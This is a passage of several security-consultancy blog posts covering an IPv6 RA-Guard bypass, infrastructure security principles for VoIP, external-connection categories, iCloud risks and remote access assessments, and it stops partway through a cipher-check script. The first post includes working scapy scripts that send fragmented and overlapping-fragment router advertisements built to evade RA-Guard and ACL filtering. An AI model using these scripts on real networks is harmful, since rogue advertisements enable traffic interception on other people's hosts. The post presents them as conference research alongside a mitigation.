TROOPERS12 came to an end last week on Friday; needless to say it was an awesome event. 😉
The first two days offered workshops on various topics. On Monday Enno, Marc “Van Hauser” Heuse and I gave a one-day workshop on “Advanced IPv6 Security”. I think attendees as well as trainers had a really good time during and after the workshop fiddling around with IPv6. Especially Marc had quite some fun when he discovered that we provided “global” IPv6 connectivity for the conference network; according to one of his tweets, TROOPERS12 was the first security conference he visited that offered this kind of connectivity.
So, back to the topic.
Our last posts on IPv6 security go back to the first half of 2011. If you haven’t read them already, now is a good time to do so. You can find them here, here, here and here.
In the last post of the series Enno discussed how RA-Guard can be circumvented with clever use of extension headers. As a short reminder, the packet dump looks like this.
The information about the upper-layer protocol is only present in the second fragment, so RA-Guard does not kick in.
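For illustration only, a minimal scapy sketch (not the THC tool we actually used) that crafts such a fragmented router advertisement could look roughly like this; the advertised prefix and the fragment size are arbitrary assumptions and may need tuning depending on your scapy version:

#!/usr/bin/env python
# Minimal sketch (assuming scapy 2.x with IPv6 support, run as root): craft an RA
# hidden behind a fragment header plus a padded destination options header, so the
# upper-layer (ICMPv6) type only shows up in a later fragment.
from scapy.all import (IPv6, IPv6ExtHdrFragment, IPv6ExtHdrDestOpt, PadN,
                       ICMPv6ND_RA, ICMPv6NDOptPrefixInfo, fragment6, send)

ra = (IPv6(dst="ff02::1")                                         # all-nodes multicast
      / IPv6ExtHdrFragment()                                      # ask scapy to fragment here
      / IPv6ExtHdrDestOpt(options=[PadN(optdata=b"\x00" * 100)])  # filler options
      / ICMPv6ND_RA()
      / ICMPv6NDOptPrefixInfo(prefix="2001:db8:dead::", prefixlen=64))  # bogus prefix

# Fragment size chosen so that the RA itself ends up in a later fragment;
# adjust if your scapy version splits differently.
send(fragment6(ra, 120))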
As we found out at the Heise IPv6 Kongress last year, this issue can be mitigated with the following parameter in an IPv6 ACL.
deny ipv6 any any undetermined-transport
As a reminder, this parameter drops all IPv6 packets where the upper-layer protocol information cannot be determined.
After the workshop was officially over, Marc and I played a little bit with this ACL parameter to see whether it works as intended. So I configured the following IPv6 ACL on our beautiful Cisco 4948E:
4948E(config)#ipv6 access-list IPv6
4948E(config-ipv6-acl)#deny ipv6 any any undetermined-transport
4948E(config-ipv6-acl)#permit ipv6 any any
4948E(config)#interface g1/19
4948E(config-if)#ipv6 traffic-filter IPv6 in
We started the attack again with the following parameter:
Nothing happened on my (IPv6-enabled) laptop (which is a good thing ;)).
The corresponding packet dump looked quite unspectacular:
Only the STP packets could be seen; the flooded router advertisements were dropped by the switch.
So could this parameter solve the issue with the whole RA mess?
Unfortunately the answer is no. The ACL parameter does mitigate the issue with the fragmented router advertisement; however, it can be circumvented by using overlapping fragments. We couldn’t test this scenario because it wasn’t yet implemented in the THC Tool Suite, but this is just a matter of time…
The IPv6 packet basically looks like this (a scapy sketch of these two fragments follows the layout):
Fragment 1:
IPv6 Header
Fragmentation Header
Destination Header (8 bytes)
ICMPv6 with Echo Request
Fragment 2:
IPv6 Header
Fragmentation Header with offset == 1 (equals the position of the 8th byte, i.e. the start of the Echo Request in the first fragment)
ICMPv6 with RA
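Just to illustrate the layout described above, the two overlapping fragments could be hand-built in scapy roughly like this (untested at the time, just like the scenario itself; the addresses, the fragment ID and the checksum handling are simplified assumptions):

# Sketch only: hand-built overlapping fragments as described above (scapy 2.x assumed).
# Note: for a target to accept the reassembled RA, the ICMPv6 checksum may have to be
# precomputed over the reassembled datagram; this is omitted here for brevity.
from scapy.all import (IPv6, IPv6ExtHdrFragment, IPv6ExtHdrDestOpt,
                       ICMPv6EchoRequest, ICMPv6ND_RA, send)

FRAG_ID = 0x1337   # arbitrary, but must be identical in both fragments

# Fragment 1: fragment header (offset 0, more-fragments set) + 8-byte destination
# options header + an innocent-looking ICMPv6 Echo Request.
frag1 = (IPv6(dst="ff02::1")
         / IPv6ExtHdrFragment(id=FRAG_ID, offset=0, m=1)
         / IPv6ExtHdrDestOpt()            # scapy pads this to 8 bytes by default
         / ICMPv6EchoRequest())

# Fragment 2: offset == 1 (one 8-byte unit), i.e. it starts exactly where the Echo
# Request started in fragment 1 and overwrites it with an RA on stacks that honor
# the later fragment during reassembly.
frag2 = (IPv6(dst="ff02::1")
         / IPv6ExtHdrFragment(id=FRAG_ID, offset=1, m=0)
         / ICMPv6ND_RA())

send([frag1, frag2])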
In this case it depends on the operating system whether or not the packet is discarded when overlapping fragments are detected. RFC 5722 is very specific on how these should be handled:
“When reassembling an IPv6 datagram, if one or more of its constituent fragments is determined to be an overlapping fragment, the entire datagram (and any constituent fragments, including those not yet received) MUST be silently discarded.”
So it is up to the operating system to implement this behavior. We’ll see how things work out 😉
If you’re interested in more IPv6 issues, or simply wanna chat about this topic, meet Enno and me again at the Heise IPv6 Kongress this year in Frankfurt, where we will give a talk on IPv6 as well.
If you’re following this blog regularly or if you’ve ever attended an ERNW-led workshop which included an “architecture section”, you will certainly remember the “Seven Sisters of Infrastructure Security” stuff (used for example in this post). These are a number of (well, more precisely, it’s seven ;-)) fundamental security principles which can be applied to any complex infrastructure, be that a network, a building, an airport or the like.
As part of our upcoming Black Hat and Troopers talks we will apply those principles to some VoIP networks we (security-) assessed and, given we won’t cover them in detail there, it might be helpful to perform a quick refresher of them, together with an initial application to VoIP deployments. Here we go; these are the “Seven Sisters of Infrastructure Security”:
Access Control
Isolation
Restriction
Encryption
Entity Protection
Secure Management
Visibility
Now, let me discuss them in a bit more detail and put them into a VoIP context.
Access Control (“try to keep the threats out of the environment containing the assets to be protected”)
This should pretty much always be an early consideration as limiting access to “some complex infrastructure” obviously provides a first layer of defense and does so in a preventative[1] way. Usually authentication plays a major role here. Please note that in computer networks the access control principle does not only encompass “access to the network [link]” (where unfortunately the most prevalent technology – Ethernet – does not include easy-to-use access control mechanisms. And, yes, I’m aware of 802.1X…) but can be applied to any kind of (“sub-level”) communication environment or exchange. Taking a “passive-interface” approach for routing protocols is a nice example here as this usually serves to prevent untrusted entities (“the access layer”) from participating in some critical protocol [exchange][2] at all.
In a VoIP scenario, limiting who can participate in the various layers and communication exchanges, be it by authentication, be it by configuration of static communication peers for certain exchanges[3] (yes, we know this might not scale and usually has bad operational feasibility), would be an implementation of the access control principle.
Isolation (“separate some elements of the environment from others, based on attributes like protection need, threat potential or trust/worthiness”)
In computer networks this one is usually implemented by network segmentation (with different technologies like VLANs or VRFs and many others) and it’s still one of the most important infrastructure security principles. I mean, can you imagine an airport or corporate headquarters without areas of differing protection needs, different threat exposure or separate layers and means of access? [You can’t? So why do you think about virtualizing all your corporate computer systems on one big unified “corporate cloud”? ;-)]
Again, it should be noted that “traditional network segmentation” is only one variant. Using RFC 1918 (or ULA, for that matter) addresses in some parts of your network without NATing them at some point, or refraining from route distribution at some demarcation point constitute other examples.
In the VoIP world the main realization of the isolation principle is the commonly found approach of “voice vs. data VLAN[s]”.
Restriction (“once [as of the above principle] isolated parts get connected try to limit the interaction between those parts at the intersection point”)
This is the one most people think of when it comes to network security, as this is what the most widely deployed network security control, that is the firewall, is supposed to do.
Two points should be noted here, from our perspective:
In some network security architecture documents phrases going like “the different segments are [to be] separated by firewalls” can be found. Which, well, is a misconception: usually a firewall connects networks (which would be isolated otherwise), it does not separate them. It may (try to) limit the traffic passing the intersection point but it still is a connection element.
And it should be noted that the restriction it applies (by filtering traffic) always has an operational price tag. Which is one of the reasons why firewalls nowadays tend to fail so miserably when it comes to their actual security benefit…
In VoIP networks using the restriction approach is considerably hard (and hence quite often simply doesn’t happen), given the volatility of a number of protocols when it comes to the (UDP/TCP) ports they use.
Encryption (“while in transit encrypt some asset to protect it from threats on its [transit] way”)
This is a very common infrastructure security control as well (alas, at times the only one people think of) and probably does not need further explanation here.
Still it should be noted – again – that it has an operational price tag (key management and the like). Which – again – is the very reason why it sometimes fails so miserably when it comes to providing actual security…
In the VoIP world (as this one is very much about “assets in transit”) it’s nowadays quite a common one, even though a number of environments still refrain from using it, mainly due to the mentioned “operational price tag”.
Entity Protection (“take care of the security exposure of the individual elements within the environment containing the assets to be protected”)
This encompasses all measures intended to increase the security of individual elements. It’s not limited to simple hardening though, but includes all other “security [posture] quality assurance” things like pentesting or code reviews (when the element looked at is an application).
Adding a comment again, I’d like to state that, in times of virtualization and vaporizing security layers (deploying shiny apps pretty much directly connecting customers to your ERP systems by means of fancy webservices), this one might become more and more important. In the past many security architectures relied on layers of isolation & restriction and thereby skipped the hardening/quality assurance step (“we don’t have to harden this Solaris box as there’s a firewall in front of it”). As the talks’ case studies will show, this one is fundamental (and overlooked) in many VoIP deployments.
Secure Management (“manage the [infrastructure] elements in a secure way”)
Secure management usually can be broken down to:
Restrict the endpoints allowed to establish management connections.
Either use a trusted environment (network link) or use secure variants of mgmt. protocols instead of their less secure counterparts (SSH vs. Telnet, HTTPS vs. HTTP, SNMPv3 vs. community-based SNMP and the like).
Log security-related events and potentially all management actions performed.
While this is (should be) an obvious security principle, daily assessment experience shows that failures/weaknesses in this space account for the majority of critical vulnerabilities when it comes to infrastructure security. This applies in particular to VoIP implementations (see the case studies for examples).
Visibility (“be able to assess the current security posture of your infrastructure and its elements with reasonable effort”)
This is where logging (+ analysis), monitoring etc. come into play. We’d like to note that while this is a valid infrastructure security principle, its actual security benefit is often overestimated given the “detection/reaction” nature of this principle and its subsequent bad operational feasibility.
This is a particularly interesting (and neglected) one in many VoIP environments. Usually the data generated in this space (for VoIP) cannot be easily processed (by the $SIEM you acquired two years ago for a six-figure € number and which still has only a handful of use cases defined…), while on the other hand being heavily useful (or even required for legal follow-up) in one of those numerous billing fraud incidents.
How to Apply those Principles in a Generic Way
As the above application to VoIP shows, these fundamental security principles allow for tackling any type of “securing assets within a complex overall setting” by going through a simple (checklist-type) set of questions derived from them. These questions could look like this (a small code sketch of such a checklist follows the list):
Can we limit who’s taking part in some network, protocol, technology, communication act?
Any need to isolate stuff due to different protection need, (threat) exposure or trust(worthiness)?
What can be done, filtering-wise, on intersection points?
Where to apply encryption in an operationally reasonable way?
What about the security of the overall system’s main elements?
How to manage the infrastructure elements in a secure way?
How to provide visibility as for security-related stuff, with reasonable effort?
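Purely as an illustration, such a checklist could even be captured in a few lines of code, e.g. to record answers per assessed item; the assess() helper and the item name are made up, of course:

# Illustration only: the seven principles and their derived questions as a simple
# data structure, so answers can be recorded per assessed item.
CHECKLIST = {
    "Access Control":    "Can we limit who's taking part in some network, protocol, technology, communication act?",
    "Isolation":         "Any need to isolate stuff due to different protection need, (threat) exposure or trust(worthiness)?",
    "Restriction":       "What can be done, filtering-wise, on intersection points?",
    "Encryption":        "Where to apply encryption in an operationally reasonable way?",
    "Entity Protection": "What about the security of the overall system's main elements?",
    "Secure Management": "How to manage the infrastructure elements in a secure way?",
    "Visibility":        "How to provide visibility as for security-related stuff, with reasonable effort?",
}

def assess(item):
    """Ask each of the seven questions for the given item and collect the answers."""
    return {principle: input("[%s] %s\n> " % (item, question))
            for principle, question in CHECKLIST.items()}

if __name__ == "__main__":
    print(assess("VoIP deployment"))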
In a sequel to this post I might cover the mentioned case studies in more detail. In case I miss doing so, the slides will be available after the respective events ;-).
Have a great Sunday,
Enno
[1] As it requires what is usually the most scarce resource of an organization, that is, humans and their brains. The part that cannot be easily substituted by technology…
[1] In general preventative controls have a better cost/benefit ratio than detective or reactive ones. And this is still true in the “you’ll get owned anyway that’s why you should spend lots of resources on detective/reactive controls” marketing hype age…
[2] To provide another example from the routing protocol space: the “inter-operator trust and TCP-” based nature of BGP (as opposed to the “multicast and UDP-“based nature of other routing protocols) certainly is one of the most fundamental stability contributing properties of the current Internet.
[3] Another simple example here. If the two VoIP gateways in the incident described here had used a host route for each other instead of their default route (which wasn’t needed given their only function was to talk to each other), presumably the whole thing wouldn’t have happened.
I’m currently involved in creating an up-to-date approach to handling external connections (read: temporary/permanent connections with external parties like business partners) of a very large enterprise. At the moment they have something along the lines of: “there are two types of external connections, trusted and untrusted. The untrusted ones have to be connected by means of a double-staged firewall”.
Which – of course – doesn’t work at all in a VUCA world, for a number of reasons: the demarcation between trusted and untrusted is quite unclear (just think of mergers & acquisitions); “business doesn’t like implementing 2-staged firewalls in some part of the world where they just signed the memorandum for a joint venture to build windmills in the desert”; firewalls might not be the appropriate control for quite some threats anyway (see for example slide 46 of this presentation); and so on. Not to mention that I personally think that the “double-staged firewall” thing is based on an outdated threat model, in particular when implemented with two different vendors, for the simple reason that the added operational effort usually is not worth the added security benefit (see this post for some discussion of the concept of “operational feasibility”…).
Back to the initial point: the approach to be developed is meant to work on the basis of several types of remote connections, each of which determines associated security controls and other parameters. Which, at first glance, does not seem overly complicated, but – as always – the devil is in the details.
What to base those categories on: the trust or security level of the other party (called “$OTHER_ORG” in the following) – or just assume they’re all untrusted? The protection needs of the data accessed by $OTHER_ORG? The (network) type of connection or number & type of users (unauthenticated vs. authenticated, many vs. few), the technical characteristics of the services involved (is an outbound Bloomberg link to be handled differently than an inbound connection to some published application, by means of a Citrix Access Gateway? if so, in what way?) etc.
As a start we put together a comprehensive list of questions regarding the business partner, the characteristics of the connection, the data accessed and other stuff. These have to be answered by the (“business side”) requestor of an external connection. To give you an idea of the nature of the questions, here are the first of those (~40 overall) questions:
Please provide details as for the company type and ownership of $OTHER_ORG.
More specifically: does $COMPANY hold shares of $OTHER_ORG?
Who currently manages the IT infrastructure of $OTHER_ORG?
Does $OTHER_ORG hold security-relevant (e.g. ISO 27001) certifications, or are they willing to provide SAS 70/ISAE 3402/SSAE 16 (“Type 2”) reports?
What is – from your perspective – $OTHER_ORG’s maturity level as for information security management, processes and overall posture?
How long will the connection be needed?
Which $COMPANY resources does $OTHER_ORG need to access?
Does a risk assessment for the mentioned ($COMPANY) resources exist?
What is the highest (data) classification level that $OTHER_ORG needs access to?
What is the highest (data) classification of data stored on systems that $OTHER_ORG accesses by some means (even if this data is not part of the planned access)?
Will data be accessed/processed that is covered by regulatory frameworks [e.g. Data Protection, PCI, SOX]?
What would – from your perspective – be the impact for $COMPANY in case the data in question was disclosed to unauthorized 3rd parties?
What would – from your perspective – be the impact for $COMPANY in case the data in question was irreversibly destroyed?
What would – from your perspective – be the impact for $COMPANY in case the service(s) in question was/were rendered unavailable for a certain time?
We then defined an initial set of “types of connections” that have different characteristics and might be handled with different measures (security controls being a subset of these). These connection types/categories included:
“trusted business partners”/TBP (think of outsourcing partners, with strong mutual contractual controls in place etc.).
“external business partner”/EBP (this is the kind-of default, “traditional” case of an external connection).
“mergers & acquisitions [heritage]”/MA (including all those scenarios deriving from M & A, like “we legally own them but don’t really know the security posture of their IT landscape” or “somebody else now legally owns them, but they still need heavy access to our central systems, for the next 24-36 months”).
“business applications”/BusApp (think of Bloomberg access in finance or chemical databases in certain industry sectors).
“external associates”/ExtAss (“those three developers from that other organization we collaborate with on developing a new portal for some service, who need access to the project’s subversion system which happens to sit in our network”).
Next we tried to assign a category by analyzing the answers in a “point-based” manner (roughly going like: “in case we own them by 100%, give a point for TBP”, “in case the connection is just outbound to a limited set of systems, give a point to BusApp”, “if it’s an inbound connection from less than 10 users, here’s a point for ExtAss” etc.), in an MS Excel sheet containing the questions together with drop-down response fields (plus comments where needed) and some calculation logic embedded in the sheet. This seemed a feasible approach, but reflecting on the actual points and assignment system, we realized that, at the end of the day, all these scenarios can be broken down to three relevant parameters which in turn determine the handling options. These parameters are:
the trustworthiness of some entity (e.g. an organization, a network [segment], some users). Pls note that _their trustworthiness_ is the basis for _our trust_, so both terms express two sides of the same coin.
the (threat) exposure of systems and data contained in certain parts of some (own|external) network.
the protection needs of systems and data contained in certain parts of (usually the “own”/$COMPANY’s) network.
Interestingly enough every complex discussion about isolating/segmenting or – the other side of the story – connecting/consolidating (aka “virtualizing”) systems and networks can be reduced to those three fundamentals, see for example this presentation (and I might discuss, in another post, a datacenter project we’re currently involved in where this “reduction” turned out to be useful as well).
From this perspective a total of eight categories can be defined, with each of the mentioned parameters being either “high” or “low”, i.e. all combinations of high/low trustworthiness, exposure and protection need.
Taking this route greatly facilitates the assignment of both individual connections to a category and sets of potential (generic) controls to the connection type categories, as each answer (to one of those questions) directly influences one of those three parameters (e.g. “we hold more than 50% of their shares” => increase trust; “$OTHER_ORG needs to access some of our systems with high privileges” => increase exposure; “data included that is subject to breach laws” => increase protection need etc.).
Which in turn allows a (potentially weighted) points-based approach to identify those connections with many vs. few (trust|exposure|protection need) contributing factors.
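A very rough sketch of what such a (weighted) points-based mapping could look like in code; the weights and the threshold for “high” are made-up placeholders:

# Rough sketch: each questionnaire answer adds a (possibly weighted) score to one of
# the three parameters; crossing a (made-up) threshold turns that parameter "high",
# which yields one of the 2^3 = 8 categories.
from dataclasses import dataclass

@dataclass
class ConnectionScore:
    trust: float = 0.0
    exposure: float = 0.0
    protection_need: float = 0.0

    def category(self, threshold=2.0):
        # One of the eight (trust | exposure | protection need) high/low combinations.
        return tuple("high" if value >= threshold else "low"
                     for value in (self.trust, self.exposure, self.protection_need))

score = ConnectionScore()
score.trust += 2.0            # e.g. "we hold more than 50% of their shares"
score.exposure += 2.0         # e.g. "$OTHER_ORG accesses some of our systems with high privileges"
score.protection_need += 2.0  # e.g. "data included that is subject to breach laws"
print(score.category())       # ('high', 'high', 'high')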
More on this including details on the actual calculation approach and the final assignment of a category in the next part of this series which is to be published soon…
“This document was produced jointly with the OWASP mobile security project. It is also published as an ENISA deliverable in accordance with our work program 2011. It is written for developers of smartphone apps as a guide to developing secure apps. It may however also be of interest to project managers of smartphone development projects.
In writing the top 10 controls, we considered the top 10 most important risks for mobile users as described in (1) and (2). As a follow-up we are working on platform-specific guidance and code samples. We hope that these controls provide some simple rules to eliminate the most common vulnerabilities from your code.”
After having a first look at the document’s content I can, while not being a developer myself, state that there’s a lot of valuable guidance in it. Which is particularly useful as our assessment experience shows that quite some things (examples to be discussed in this upcoming talk at Troopers) can go wrong when it comes to application security on smartphones.
Currently there’s quite some discussion ongoing why it took Apple so long to fix a severe vulnerability in the update process of iTunes. A severe vulnerability which could easily be exploited by means of an automated tool called evilgrade which can be downloaded here (Hi Francisco!). Just one small note here: did you know that evilgrade was first shown and released at the 2008 edition of Troopers? We had a number of initial releases of tools in the last years (like wafw00f at the 2009 edition and VASTO at the 2010 edition) and we will continue this fine tradition in 2012. I can already promise that some nice code is going to be released for the first time at Troopers12…
The above is the exact title of a Gartner research note published some days ago. Its main thesis is that an increased convergence of carriers’ MPLS and Internet infrastructures onto shared IP infrastructures requires that enterprises re-evaluate their security and performance risks.
While I do not agree with the overall line of reasoning in the paper, it still highlights a number of interesting points when it comes to MPLS security. Which in turn reminds me of quite some stuff we’ve done in the past, mainly our Black Hat Europe 2009 talk “All your packets are belong to us – Attacking backbone technologies”. Today we’ll release an updated version of the accompanying whitepaper as a kind-of technical report. Its title is “Practical Attacks against MPLS or Carrier Ethernet Networks” and it can be found here.
Enjoy reading,
Enno
btw: for those of you who have actually read the Gartner paper… did you notice their repeated reference to customer RFIs/RFPs not covering a carrier’s separation between their public Internet and MPLS infrastructures? Here’s a document that describes how a given carrier’s trustworthiness might be evaluated and which furthermore contains an excerpt from an RFI (written back in 2006!) which, amongst others, asks for this very point…
As a follow-up to this post somebody pointed us to this interesting article on S/MIME support and associated certificate mgmt in iOS 5. Nice read which some of you may find worthwhile.
On a related note: if anyone is aware of an easy way/good (3rd party) solution for pushing certs to iOS devices (besides SCEP) we would be very interested in that one. In that case pls leave a comment or shoot us an email.
A few days ago (on 10/12/2011) Apple launched its new cloud offering which is called — who would have guessed 😉 — iCloud. Since we’re performing quite some research in the area of cloud security, we had a first look at the basic functionality and concepts of the iCloud. Its main features include the possibility to store full backups of Apple devices (an iPhone, iPad or iPod touch running iOS 5, or a Mac running OS X Lion 10.7.2, is required), photos, music, or documents online. The data to be stored online is initially pushed to the cloud storage and then synchronized to any device which is using the same iCloud account. From this moment on, all changes to the cloudified data are immediately synchronized to the iCloud and then pushed to all participating devices.
At this point, most infosec people might start to worry a little bit: the common cloud concept of centralized data storage on the premises of a third party does not cope well with the usual control-focused approach of most technical infosec guys. The resulting concerns can be attributed to several main cloud computing related risks (which were proposed by ENISA and are actually very valuable work):
Lock In: According to the way the cloud functionality is integrated into iOS and OS X, usage of the iCloud might result in strong lock-in effects. There is neither the possibility to use a different backend cloud storage for this functionality nor the possibility to develop a product which provides similar functionality (see later paragraphs for examples).
Isolation Failure: This is probably the most prominent threat for many IT people, since it is highly related to technical implementation details. It includes, but is not limited to, breakout attacks from guest systems due to vulnerabilities in the hypervisor or unauthorised data access due to insufficient permission models in backend storage. Thinking of the trust factor consistency, Apple’s history of cloud-based services was not their “finest hour” (as Steve Jobs stated during his keynote on iCloud). Remembering this talk and the awkward MobileMe vulnerabilities, we would agree with that 😉
Loss of Governance: The loss of governance over data in the cloud is kind of an intrinsic risk to cloud computing (also refer to the proposed system operation life cycle and the motivation given here). Again, referring to explanations about the technical iCloud implementation in the later paragraphs, this loss might be even more relevant in the iCloud environment.
Data Protection Risks: Handing over responsibility for the storage of data to the cloud service provider, a customer also hands over the possibility to protect his valuable (or, more concretely: personal) data by controls of his choice. Reviewing Apple’s terms of service for the iCloud, the following paragraphs are somewhat related to data protection issues: “You understand that in order to provide the Service and make your Content available thereon, Apple may transmit your Content across various public networks, in various media, and modify or change your Content to comply with technical requirements of connecting networks or devices or computers. You agree that the license herein permits Apple to take any such actions.” In addition, the Apple Privacy Policy states the following: “You further consent and agree that Apple may collect, use, transmit, process and maintain information related to your Account, and any devices or computers registered thereunder, for purposes of providing the Service, and any features therein, to you.” This is reminiscent of the Dropbox Terms of Service, which even state that Dropbox is allowed to transfer your data to anybody if this is necessary in order to assure the quality of the offered service. Thinking of the trust factor components, all of these risks become even more relevant since Apple relies on third-party cloud services (namely Amazon Web Services and Azure, according to several sources, including this one), which consequently must also fulfill certain security requirements in order to lower the vulnerability factors for the presented risks.
There are some more risks according to the ENISA study, but those are beyond the scope of this post. When we do such rough assessments as sample exercises during our cloud security workshops, the participants usually ask what “they can do”. Possible controls can be divided into two groups: controls that reduce the risk to a reasonable level and controls that prohibit the usage of the particular service.
When analyzing the cloud, the control mentioned first is always crypto. Speaking of cloud storage, crypto is a valid control to ensure that unauthorized access to data (e.g. due to isolation failure, physical access or a subpoena) has no relevant impact. The only requirement is that the encryption is performed on the client side (depending on the attacker model and whether you trust your cloud service provider). For example, Amazon provides a feature called Server Side Encryption which encrypts any file that is stored within S3. Additionally, Amazon allows the implementation of a custom encryption client which enables customers to perform transparent encryption of all files stored in S3. The analysis of the security benefits, attacker models, and operational feasibility of these controls will be the subject of yet another blog post, but at least Amazon offers these encryption features.
The services offered by the iCloud differ a little bit in functionality (for example, the iCloud iTunes version is a kind-of music streaming platform), but basically there are two API functions which allow access to the iCloud backend: first, it is possible to store documents (where documents can be complete directory structures) in the iCloud; second, a so-called key-value store can be accessed. The access is encapsulated in dedicated API calls which take care of the complete data transfer, synchronization, and pushing operations using an iCloud daemon. So any use of the iCloud is strictly tied to an app (I would have called it application ;-)) which has to use the introduced iCloud API calls. Even though I’m not that familiar with the iOS/OS X architecture, I would have guessed that it would have been easily possible to add client-side encryption using the internal keychain and the usual cryptographic mechanisms. Still, this is not the case, and it is questionable, given Apple’s focus on user experience, whether this feature will be implemented in the future.
This lack of an encryption option brings up the second class of controls, which restrict the iCloud usage. This is especially important in a corporate context, where full backups of devices would potentially expose sensitive corporate data to third parties. Even though the usage might be restricted by acceptable use policies, this might not be enough, since the activation of this feature can happen accidentally: if a user logs in once to the iCloud frontend, which is possible using a regular Apple ID, the data synchronization is enabled by default and starts immediately (refer also to the quoted terms of service above). Since most corporate environments use MDM solutions, it is possible to restrict the iCloud usage at least for iOS-based devices. The corresponding configuration profiles offer several options to disable the functionality (a minimal sketch of such a profile follows the list):
allowCloudBackup
allowCloudDocumentSync
allowPhotoStream
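For illustration, a minimal sketch of how such a restrictions profile could be generated; the payload identifiers are placeholders, and in practice the MDM solution would typically create, sign and push the profile itself:

# Sketch: writes a minimal, unsigned configuration profile that disables the three
# iCloud-related options listed above. Identifiers/UUIDs are placeholders; normally
# your MDM solution creates and signs such profiles.
import plistlib
import uuid

restrictions = {
    "PayloadType": "com.apple.applicationaccess",   # restrictions payload
    "PayloadVersion": 1,
    "PayloadIdentifier": "com.example.restrictions.icloud",
    "PayloadUUID": str(uuid.uuid4()).upper(),
    "allowCloudBackup": False,
    "allowCloudDocumentSync": False,
    "allowPhotoStream": False,
}

profile = {
    "PayloadType": "Configuration",
    "PayloadVersion": 1,
    "PayloadIdentifier": "com.example.profile.icloud-restrictions",
    "PayloadUUID": str(uuid.uuid4()).upper(),
    "PayloadDisplayName": "Disable iCloud sync/backup",
    "PayloadContent": [restrictions],
}

with open("icloud-restrictions.mobileconfig", "wb") as f:
    plistlib.dump(profile, f)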
For today, this little introduction to iCloud and some of its security and trust aspects will be finished here. We will, however, continue to explore the attributes of iCloud more deeply in the near future (and we might even have a talk on it at Troopers ;-)).
We recently performed a Proof-of-Concept (PoC) implementation of certificate-based authentication with iPads in some large environment. So far the focus has been mainly on WLAN access; VPN and EAS authentication are going to follow in the next step.
As we figure that the topic might be of interest for some of you, we’ve extracted a certain, not-too-customer-specific part of the deliverable and converted it into an ERNW newsletter. Special thanks go to Rene Graf for leading the project! 😉
Of course, this stuff is going to be covered in much more detail in the Troopers12 edition of our “iOS Security Workshop” (see here for the agenda of this year or here for a German version of the current one).
I’m currently involved in a “Remote Access Security Assessment” and you might be wondering what exactly this means. Well, so did we. At least to some degree (btw: last year we provided some notes on types of security assessments here).
It happens quite often that we’re brought into an organization to perform “a security assessment” of “some item” (“our network”, “that new procurement portal”, “the PKI” etc.). It happens as well that the customer does not have a very clear idea of the way such an assessment should be carried out (telling us “you are the experts, you should know what to do”). Or the five people from the customer’s side present in the kick-off meeting have five different concepts (ok, four, as one of them only wants “to get that damned assessment done so we can finally go live”) and we end up moderating their arguments on what should be tested, how this should be done, when this is going to happen, which type of report format is needed (obviously, there are different ones, depending on the goal/scope/methodology of the assessment…) etc.
In such “vague cases” we usually define a set of (~ 10) categories/[security] criteria to be fulfilled by the item in question, based on different sources like the organization’s internal policy framework, potentially the project-to-be-assessed’s security goals, relevant standards and “common security best practices” (often the latter only to a small degree as we have a mostly risk based security approach which does not necessarily fit very well with [assumption-based] “best practices”; more on this philosophical question in yet-another-post ;-))
For example, in the case of a “Firewall & DMZ assessment” these categories/criteria could include stuff like “Dedicated LAN switches” (from $ORG’s internal guidelines), “Logging of denied packets” (same source), “Secure management” (from ISO 18028-3), “Scalability” (based on business needs as for $ITEM) or “Proper vulnerability mgmt” (ISO 27001).
We then perform a combination of assessment methods to obtain the necessary information to evaluate those categories in terms of “fulfilled”, “major/minor non-compliance”, “leads to relevant business risk”, “documentation missing” and the like.
Figuring the individual categories/criteria which are suited to the customer, their needs and the assessment’s (time, budget, political) constraints usually is intellectually challenging and thus “hard work”. Still, this approach (hopefully ;-)) ensures we can “answer the customer’s relevant question[s] in a structured way and with reasonable effort”.
So why do I tell you all this (besides the implied shameless self-plug)? I faced the very situation in the mentioned “Remote Access Security Assessment” and made some observations that I think are worthwhile sharing.
Let’s have a look at the potential sources for the approach laid out above:
a) internal policies: if I told you that “no formal document written, say, in the last five years, covering the topic and/or available to the people engaging us” could be identified, you wouldn’t be surprised, would you? 😉
[ok, I didn’t give you any details as for the customer… but does it really matter? how many organizations do you know which have an up-to-date “remote access policy”… I mean, one that actually provides reasonable guidance besides “all remote access must be secured appropriately” …]
b) standards & “best practices”
To discuss these I’d first like to introduce some level of abstraction briefly – regular readers of this blog might remember my constant endeavor to “bring structure into things” – by breaking down “a remote access solution” into the following generic entities involved:
gateway(s)
network transmission incl. protocols & algorithms
“endpoints”
Traditionally there have been 3-4 relevant standard documents in the remote access space, namely ISO 18028-4 Information technology — Security techniques — IT network security — Part 4: Securing remote access (latest version from 2005), NIST SP 800-77 Guide to IPsec VPNs (2005), NIST SP 800-113 Guide to SSL VPNs (2008) and potentially revision 1 of NIST SP 800-46 Guide to Enterprise Telework and Remote Access Security (Rev. 1 published in June 2009).
[Of course, feel free to notify me by PM or comment on this post if you’re aware of others].
Those documents are mainly focused on the first two of the above “abstract elements”, namely gateways and network transmission, which results in lengthy discussions of gateway architectures or protocol specifics and ciphers. It becomes clear that back then the main threats were considered to be “attacks against gateways” or “attacks against network traffic in transit” (whereas today the main risk is probably “unauthorized physical access to the endpoint”, after loss or theft of a device/smartphone).
But times have changed, and in 2011 I tend to assume that these two elements (gateways, network transmission) are sufficiently well handled & secured in the vast majority of organizations. Ok, just as I write this I somehow hesitate, given I recently worked in an environment where the deployed gateways (based on the – from my perspective – market-leading SSL gateway solution) were configured to support stuff like this:
SSLv3
———————————————————————-
AES256-SHA – 256 Bits
DES-CBC3-SHA – 168 Bits
AES128-SHA – 128 Bits
RC4-SHA – 128 Bits
RC4-MD5 – 128 Bits
DES-CBC-SHA – 56 Bits
EXP-DES-CBC-SHA – 40 Bits
EXP-RC2-CBC-MD5 – 40 Bits
EXP-RC4-MD5 – 40 Bits
TLSv1
———————————————————————-
AES256-SHA – 256 Bits
DES-CBC3-SHA – 168 Bits
AES128-SHA – 128 Bits
RC4-SHA – 128 Bits
RC4-MD5 – 128 Bits
DES-CBC-SHA – 56 Bits
EXP-DES-CBC-SHA – 40 Bits
EXP-RC2-CBC-MD5 – 40 Bits
EXP-RC4-MD5 – 40 Bits
Not that I regard this as a relevant risk, it’s just interesting to note. I mean, it’s 2011…
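In case you ever want to check one of your own gateways for such ciphers, a quick-and-dirty sketch along these lines might do; the hostname is a placeholder, and note that a current OpenSSL build may refuse to even offer some of these legacy ciphers locally, in which case a dedicated scanner is the better choice:

# Quick-and-dirty sketch: tries a TLS handshake with each of the weak/export ciphers
# listed above. Hostname is a placeholder; a modern OpenSSL may reject these cipher
# strings locally, so errors do not necessarily mean the server refused them.
import socket
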